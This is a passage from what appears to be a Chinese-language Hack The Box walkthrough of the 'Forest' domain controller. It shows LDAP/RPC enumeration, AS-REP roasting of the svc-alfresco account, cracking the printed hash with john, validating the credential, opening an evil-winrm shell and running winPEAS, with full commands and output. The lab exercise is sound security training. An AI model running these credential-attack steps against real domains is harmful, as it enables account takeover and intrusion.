|         userPrincipalName: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local
|         objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=htb,DC=local
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         mail: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local
|         msExchVersion: 1126140425011200
|         msExchProvisioningFlags: 0
|         homeMDB: CN=Mailbox Database 1118319013,CN=Databases,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchApprovalApplicationLink: CN=ModeratedRecipients,CN=Approval Applications,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchApprovalApplicationLink: CN=AutoGroup,CN=Approval Applications,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchMailboxSecurityDescriptor: \x01\x00\x04\x80\x14\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00,\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x04\x00\x1C\x00\x01\x00\x00\x00\x00\x02\x14\x00\x05\x00\x02\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchArchiveQuota: 104857600
|         msExchMailboxAuditEnable: FALSE
|         msExchTransportRecipientSettingsFlags: 0
|         msExchMessageHygieneSCLRejectThreshold: 7
|         msExchDumpsterWarningQuota: 20971520
|         msExchELCMailboxFlags: 130
|         msExchMailboxTemplateLink: CN=ArbitrationMailbox,CN=Retention Policies Container,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchHideFromAddressLists: TRUE
|         msExchHomeServerName: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=EXCH01
|         msExchMasterAccountSid: \x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchMessageHygieneSCLQuarantineThreshold: 9
|         msExchMailboxGuid: \x07n\xDFY\x96\x86ZD\x96\xB7\x85q\xAD\x8B\x026
|         msExchMessageHygieneSCLJunkThreshold: 4
|         msExchDumpsterQuota: 31457280
|         msExchCalendarLoggingQuota: 6291456
|         msExchUMDtmfMap: emailAddress:797836624526930340920239247209233222869203201
|         msExchUMDtmfMap: lastNameFirstName:797836624526930340920239247209233222869203201
|         msExchUMDtmfMap: firstNameLastName:797836624526930340920239247209233222869203201
|         msExchArchiveWarnQuota: 94371840
|         msExchModerationFlags: 6
|         msExchRecipientSoftDeletedStatus: 0
|         msExchUserAccountControl: 2
|         msExchUMEnabledFlags2: -1
|         msExchMailboxFolderSet: 0
|         msExchMessageHygieneSCLDeleteThreshold: 9
|         msExchRecipientDisplayType: 10
|         mDBUseDefaults: FALSE
|         msExchBypassAudit: FALSE
|         msExchMailboxAuditLogAgeLimit: 7776000
|         msExchPoliciesIncluded: f5cca5ec-fafc-4e09-8b7f-be05572cb7cb
|         msExchPoliciesIncluded: {26491cfc-9e50-4857-861b-0cb8df22b5d7}
|         msExchRecipientTypeDetails: 8388608
|         mailNickname: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
|         msExchWhenMailboxCreated: 20190919114755.0Z
|         msExchGroupSecurityFlags: 0
|         msExchAddressBookFlags: 1
| 
| 
|_Result limited to 20 objects (see ldap.maxobjects)

Nmap done: 1 IP address (1 host up) scanned in 4.58 seconds

14、这里使用 ldapsearch 工具，继续检索一些信息查看下

┌──(kali㉿kali)-[~/桌面]
└─$ ldapsearch -x -H ldap://10.10.10.161 -b "dc=htb,dc=locl"
# extended LDIF
#
# LDAPv3
# base <dc=htb,dc=locl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 10 Referral
text: 0000202B: RefErr: DSID-031007F9, data 0, 1 access points
        ref 1: 'htb.loc
 l'

ref: ldap://htb.locl/dc=htb,dc=locl

# numResponses: 1

15、接上一个rpc端口服务，还可以使用 rpcenum 工具进行枚举一些信息

┌──(kali㉿kali)-[~/桌面/htb-tools/rpcenum]
└─$ sudo ./rpcenum -i 10.10.10.161 -e All

[*] Enumerating Domain Users...

  +                       +
  | Users                 |                                                              
  +                       +                                                              
  | Administrator         |                                                              
  | Guest                 |                                                              
  | krbtgt                |                                                              
  | DefaultAccount        |                                                              
  | $331000-VK4ADACQNUCA  |                                                              
  | SM_2c8eef0a09b545acb  |                                                              
  | SM_ca8c2ed5bdab4dc9b  |                                                              
  | SM_75a538d3025e4db9a  |                                                              
  | SM_681f53d4942840e18  |                                                              
  | SM_1b41c9286325456bb  |                                                              
  | SM_9b69f1b9d2cc45549  |                                                              
  | SM_7c96b981967141ebb  |                                                              
  | SM_c75ee099d0a64c91b  |                                                              
  | SM_1ffab36a2f5f479cb  |                                                              
  | HealthMailboxc3d7722  |                                                              
  | HealthMailboxfc9daad  |                                                              
  | HealthMailboxc0a90c9  |                                                              
  | HealthMailbox670628e  |                                                              
  | HealthMailbox968e74d  |                                                              
  | HealthMailbox6ded678  |                                                              
  | HealthMailbox83d6781  |                                                              
  | HealthMailboxfd87238  |                                                              
  | HealthMailboxb01ac64  |                                                              
  | HealthMailbox7108a4e  |                                                              
  | HealthMailbox0659cc1  |                                                              
  | sebastien             |                                                              
  | lucinda               |                                                              
  | svc-alfresco          |                                                              
  | andy                  |                                                              
  | mark                  |                                                              
  | santi                 |                                                              
  +                       +                                                              
                                                                                         
[*] Listing domain users with description...

  +                 +                                                           +
  | User            | Description                                               |        
  +                 +                                                           +        
  | Administrator   | Built-in account for administering the computer/domain    |        
  | Guest           | Built-in account for guest access to the computer/domain  |        
  | krbtgt          | Key Distribution Center Service Account                   |        
  | DefaultAccount  | A user account managed by the system.                     |        
  +                 +                                                           +        
                                                                                         
[*] Enumerating Domain Admin Users...

  +                   +
  | DomainAdminUsers  |                                                                  
  +                   +                                                                  
  | Administrator     |                                                                  
  +                   +                                                                  
                                                                                         
[*] Enumerating Domain Groups...

16、至此，枚举工作差不多结束了，通过前期rpc服务获取到目标域控靶机上的账户信息，在暴力破解之前，需要检查下这些用户是否已禁用Kerberos 预身份验证。如果是禁用的，我们将能够检索用户的哈希值，并从中检索用户的密码。

17、这里使用 impacket-GetNPUsers 工具，进行检索分析

┌──(kali㉿kali)-[~/桌面]
└─$ impacket-GetNPUsers htb.local/ -no-pass -usersfile userslist 
Impacket v0.11.0 - Copyright 2023 Fortra

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:647385e5fde97f7f0849db35fee02cb7$58a0f300f318c946006b9f6338d6cc51f705634786ca41a8ff5e27221fed64e3cfdc33ad0428c6e62a0488fda315b4de21869a5eb6de6237c5c051e22781399d32bc87392f2118e06f7c002c37d4e3e2ed1d10cff46626d0a05cc8cd9518aef9ff971cf912b4c96b86f315ae40a91fe0fb73020442a45df6c640a263b66659c646ba72d7ef57deec699dacf28211b6f52ab1abd23cb542a23fa75e1331fb346d84d653b0121de382b9fab42ea6bda2373fe4759ec41317cfd831c9f64948b37be24fa90c40d9aa57e4505c933b59eb22acb36bdfb45e923fc43de0b4f4b0f14dc316f8564dc1
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

18、到这里，我们获取到了用户 svc-alfresco 的TGT Ticket，里面包含密码密文登，我们可以使用john工具来进行破解

┌──(kali㉿kali)-[~/桌面]
└─$ sudo john ./svc-alfresco-hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 
[sudo] kali 的密码：
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)     
1g 0:00:00:03 DONE (2023-12-19 22:02) 0.2967g/s 1212Kp/s 1212Kc/s 1212KC/s s4ls469..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

19、成功的破解出来了，账号：svc-alfresco 密码：s3rvice

20、当获取到一个Windows下的账号密码时，可以使用 smb 和 winrm 两个协议，来验证账号密码是否正确，这里使用 crackmapexec 这个工具进行验证

crackmapexec smb 10.10.10.161 -u "svc-alfresco" -p "s3rvice"

┌──(kali㉿kali)-[~/桌面]
└─$ crackmapexec smb 10.10.10.161 -u "svc-alfresco" -p "s3rvice"
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing FTP protocol database
[*] Initializing SSH protocol database
[*] Initializing RDP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [+] htb.local\svc-alfresco:s3rvice

crackmapexec winrm 10.10.10.161 -u "svc-alfresco" -p "s3rvice"

┌──(kali㉿kali)-[~/桌面]
└─$ crackmapexec winrm 10.10.10.161 -u "svc-alfresco" -p "s3rvice"
SMB         10.10.10.161    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

21、当然也可以是使用 ldap 和 rpc 来验证当前的账户密码是否正确，因为域控靶机上是开放的这个服务的，前期获取信息时，使用的是匿名的方式，这次可以使用已获取的用户信息进行登录来尝试。

ldapwhoami -x -v -D svc-alfresco -w s3rvice -H ldap://10.10.10.161

┌──(kali㉿kali)-[~/桌面]
└─$ ldapwhoami -x -v -D svc-alfresco -w s3rvice -H ldap://10.10.10.161
ldap_initialize( ldap://10.10.10.161:389/??base )
u:HTB\svc-alfresco
Result: Success (0)

rpcclient -U svc-alfresco --password=s3rvice 10.10.10.161

┌──(kali㉿kali)-[~/桌面]
└─$ rpcclient -U svc-alfresco --password=s3rvice 10.10.10.161
rpcclient $> getusername
Account Name: svc-alfresco, Authority Name: HTB
rpcclient $>

22、可以看到密码是正确的，这里我们直接使用 evil-winrm 工具来直接获取一个交互式的shell，获取初始的flag信息

┌──(kali㉿kali)-[~/桌面]
└─$ evil-winrm -i 10.10.10.161 -u "svc-alfresco" -p "s3rvice"
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                           
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                             
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type C:\Users\svc-alfresco\Desktop\user.txt
4b67b2d81b12e5bcab8f5c93964b402e
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

0x02 系统权限获取

23、当获取到初始权限后，需要先查看下当前这个用户所拥有的权限

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

SeMachineAccountPrivilege:
Description: 允许用户将工作站添加到域中。
State: 已启用（Enabled）。

SeChangeNotifyPrivilege:
Description: 允许用户绕过遍历检查（Bypass traverse checking）。
State: 已启用（Enabled）。

SeIncreaseWorkingSetPrivilege:
Description: 允许用户增加一个进程的工作集（Working Set）。工作集是进程在物理内存中占用的部分。
State: 已启用（Enabled）。

24、可以看到，我们拥有一些操作权限，接下来查看下当前用户的一些信息

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user svc-alfresco
User name                    svc-alfresco
Full Name                    svc-alfresco
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            12/19/2023 6:14:01 AM
Password expires             Never
Password changeable          12/20/2023 6:14:01 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/19/2023 6:01:58 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Service Accounts
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

25、可以看出我们域用户组和服务账号组的，当初始信息收集的不太全面时，可以使用自动化工具进行信息搜集，这里使用 winPEASx64.exe 工具进行信息上传，我们先把工具上传到靶机上面

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /htb-tools/winPEASx64.exe
                                        
Info: Uploading /home/kali/桌面//htb-tools/winPEASx64.exe to C:\Users\svc-alfresco\Documents\winPEASx64.exe                                                                       
                                        
Data: 3183272 bytes of 3183272 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/19/2023   6:31 AM        2387456 winPEASx64.exe

26、然后开始执行 winPEASx64.exe ，来查看一些显示信息

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./winPEASx64.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD

               ((((((((((((((((((((((((((((((((                                          
        (((((((((((((((((((((((((((((((((((((((((((                                      
      ((((((((((((((**********/##########(((((((((((((                                   
    ((((((((((((********************/#######(((((((((((                                  
    ((((((((******************/@@@@@/****######((((((((((                                
    ((((((********************@@@@@@@@@@/***,####((((((((((                              
    (((((********************/@@@@@%@@@@/********##(((((((((                             
    (((############*********/%@@@@@@@@@/************((((((((                             
    ((##################(/******/@@@@@/***************((((((                             
    ((#########################(/**********************(((((                             
    ((##############################(/*****************(((((                             
    ((###################################(/************(((((                             
    ((#######################################(*********(((((                             
    ((#######(,.***.,(###################(..***.*******(((((                             
    ((#######*(#####((##################((######/(*****(((((                             
    ((###################(/***********(##############()(((((                             
    (((#####################/*******(################)((((((                             
    ((((############################################)((((((                              
    (((((##########################################)(((((((                              
    ((((((########################################)(((((((                               
    ((((((((####################################)((((((((                                
    (((((((((#################################)(((((((((                                 
        ((((((((((##########################)(((((((((                                   
              ((((((((((((((((((((((((((((((((((((((                                     
                 ((((((((((((((((((((((((((((((                                          

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.                                                                                   
                                                                                         
  WinPEAS-ng by @hacktricks_live                                                         

       /---------------------------------------------------------------------------------\                                                                                        
       |                             Do you like PEASS?                                  |                                                                                        
       |---------------------------------------------------------------------------------|                                                                                        
       |         Get the latest version    :     https://github.com/sponsors/carlospolop |                                                                                        
       |         Follow on Twitter         :     @hacktricks_live                        |                                                                                        
       |         Respect on HTB            :     SirBroccoli                             |                                                                                        
       |---------------------------------------------------------------------------------|                                                                                        
       |                                 Thank you!                                      |                                                                                        
       \---------------------------------------------------------------------------------/                                                                                        
                                                                                         
  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured                                                                            
         Green              Indicates that some protection is enabled or something is well configured                                                                             
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

 You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation                                             
   Creating Dynamic lists, this could take a while, please wait...                       
   - Loading sensitive_files yaml definitions file...
   - Loading regexes yaml definitions file...
   - Checking if domain...
   - Getting Win32_UserAccount info...
Error while getting Win32_UserAccount info: System.Management.ManagementException: Access denied                                                                                  
   at System.Management.ThreadDispatch.Start()                                           
   at System.Management.ManagementScope.Initialize()                                     
   at System.Management.ManagementObjectSearcher.Initialize()                            
   at System.Management.ManagementObjectSearcher.Get()                                   
   at winPEAS.Checks.Checks.CreateDynamicLists(Boolean isFileSearchEnabled)              
   - Creating current user groups list...
   - Creating active users list (local only)...
  [X] Exception: Object reference not set to an instance of an object.
   - Creating disabled users list...
  [X] Exception: Object reference not set to an instance of an object.
   - Admin users list...
  [X] Exception: Object reference not set to an instance of an object.
   - Creating AppLocker bypass list...
   - Creating files/directories list for search...


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ System Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                                                    

ÉÍÍÍÍÍÍÍÍÍ͹ Basic System Information
È Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits              
  [X] Exception: Access is denied

ÉÍÍÍÍÍÍÍÍÍ͹ Showing All Microsoft Updates
  [X] Exception: Creating an instance of the COM component with CLSID {B699E5E8-67FF-4177-88B0-3684A3388BFB} from the IClassFactory failed due to the following error: 80070005 Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)).                   

ÉÍÍÍÍÍÍÍÍÍ͹ System Last Shutdown Date/time (from Registry)
                                                                                         
    Last Shutdown Date/time        :    8/31/2021 6:34:23 AM

ÉÍÍÍÍÍÍÍÍÍ͹ User Environment Variables
È Check for some passwords or keys in the env variables 
    COMPUTERNAME: FOREST
    PUBLIC: C:\Users\Public
    LOCALAPPDATA: C:\Users\svc-alfresco\AppData\Local
    PSModulePath: C:\Users\svc-alfresco\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\svc-alfresco\AppData\Local\Microsoft\WindowsApps
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 6
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    USERPROFILE: C:\Users\svc-alfresco
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 5507
    USERNAME: svc-alfresco
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
    ComSpec: C:\Windows\system32\cmd.exe
    SystemDrive: C:
    TEMP: C:\Users\SVC-AL~1\AppData\Local\Temp
    NUMBER_OF_PROCESSORS: 2
    APPDATA: C:\Users\svc-alfresco\AppData\Roaming
    TMP: C:\Users\SVC-AL~1\AppData\Local\Temp
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: HTB
    USERDNSDOMAIN: htb.local

ÉÍÍÍÍÍÍÍÍÍ͹ System Environment Variables
È Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    OS: Windows_NT
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 6
    PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
    PROCESSOR_REVISION: 5507

ÉÍÍÍÍÍÍÍÍÍ͹ Audit Settings
È Check what is being logged 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Audit Policy Settings - Classic & Advanced

ÉÍÍÍÍÍÍÍÍÍ͹ WEF Settings
È Windows Event Forwarding, is interesting to know were are sent the logs 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ LAPS Settings
È If installed, local administrator password is changed frequently and is restricted by ACL                                                                                       
    LAPS Enabled: LAPS not installed

ÉÍÍÍÍÍÍÍÍÍ͹ Wdigest
È If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#wdigest                         
    Wdigest is not enabled

ÉÍÍÍÍÍÍÍÍÍ͹ LSA Protection
È If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#lsa-protection                         
    LSA Protection is not enabled

ÉÍÍÍÍÍÍÍÍÍ͹ Credentials Guard
È If enabled, a driver is needed to read LSASS memory https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#credential-guard                 
    CredentialGuard is not enabled

ÉÍÍÍÍÍÍÍÍÍ͹ Cached Creds
È If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials                                                                           
    cachedlogonscount is 10

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating saved credentials in Registry (CurrentPass)

ÉÍÍÍÍÍÍÍÍÍ͹ AV Information
  [X] Exception: Access denied 
    No AV was detected!!
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Windows Defender configuration
  Local Settings
  Group Policy Settings

ÉÍÍÍÍÍÍÍÍÍ͹ UAC Status
È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access                                                                             
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy: 
    FilterAdministratorToken: 0
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
      [-] Only the RID-500 local admin account can be used for lateral movement.         

ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.14393.0
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: 
    PS history size: 

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating PowerShell Session Settings using the registry
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ PS default transcripts history
È Read the PS history inside these files (if any)

ÉÍÍÍÍÍÍÍÍÍ͹ HKCU Internet Settings
    DisableCachingOfSSLPages: 0
    IE5_UA_Backup_Flag: 5.0
    PrivacyAdvanced: 1
    SecureProtocols: 2688
    User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
    CertificateRevocation: 1
    ZonesSecurityUpgrade: System.Byte[]

ÉÍÍÍÍÍÍÍÍÍ͹ HKLM Internet Settings
    EnablePunycode: 1

ÉÍÍÍÍÍÍÍÍÍ͹ Drives Information
È Remember that you should search more info inside the other drives 
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 9 GB)(Permissions: Users [AppendData/CreateDirectories])                                                                 

ÉÍÍÍÍÍÍÍÍÍ͹ Checking WSUS
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Checking KrbRelayUp
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup                                                                                    
  The system is inside a domain (HTB) so it could be vulnerable.
È You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges

ÉÍÍÍÍÍÍÍÍÍ͹ Checking If Inside Container
È If the binary cexecsvc.exe or associated service exists, you are inside Docker 
You are NOT inside a container

ÉÍÍÍÍÍÍÍÍÍ͹ Checking AlwaysInstallElevated
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated                                                                         
    AlwaysInstallElevated isn't available

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerate LSA settings - auth packages included
                                                                                         
    auditbasedirectories                 :       0
    auditbaseobjects                     :       0
    Bounds                               :       00-30-00-00-00-20-00-00
    crashonauditfail                     :       0
    CreatePolicyDatabaseOnFirstBoot       :       1
    fullprivilegeauditing                :       00
    LimitBlankPasswordUse                :       1
    NoLmHash                             :       1
    Security Packages                    :       ""
    Notification Packages                :       scecli
    Authentication Packages              :       msv1_0
    SecureBoot                           :       1
    LsaPid                               :       588
    ProductType                          :       7
    disabledomaincreds                   :       0
    everyoneincludesanonymous            :       0
    forceguest                           :       0
    restrictanonymous                    :       0
    restrictanonymoussam                 :       1

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating NTLM Settings
  LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default)
                                                                                         

  NTLM Signing Settings                                                                  
      ClientRequireSigning    : False
      ClientNegotiateSigning  : True
      ServerRequireSigning    : True
      ServerNegotiateSigning  : True
      LdapSigning             : Negotiate signing (Negotiate signing)

  Session Security                                                                       
      NTLMMinClientSec        : 536870912 (Require 128-bit encryption)
      NTLMMinServerSec        : 536870912 (Require 128-bit encryption)
                                                                                         

  NTLM Auditing and Restrictions                                                         
      InboundRestrictions     :  (Not defined)
      OutboundRestrictions    :  (Not defined)
      InboundAuditing         :  (Not defined)
      OutboundExceptions      :

ÉÍÍÍÍÍÍÍÍÍ͹ Display Local Group Policy settings - local users/machine

ÉÍÍÍÍÍÍÍÍÍ͹ Checking AppLocker effective policy
   AppLockerPolicy version: 1
   listing rules:



ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Printers (WMI)

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Named Pipes
  Name                                                                                                 CurrentUserPerms                                                       Sddl

  eventlog                                                                                             Everyone [WriteData/CreateFiles]                                       O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)

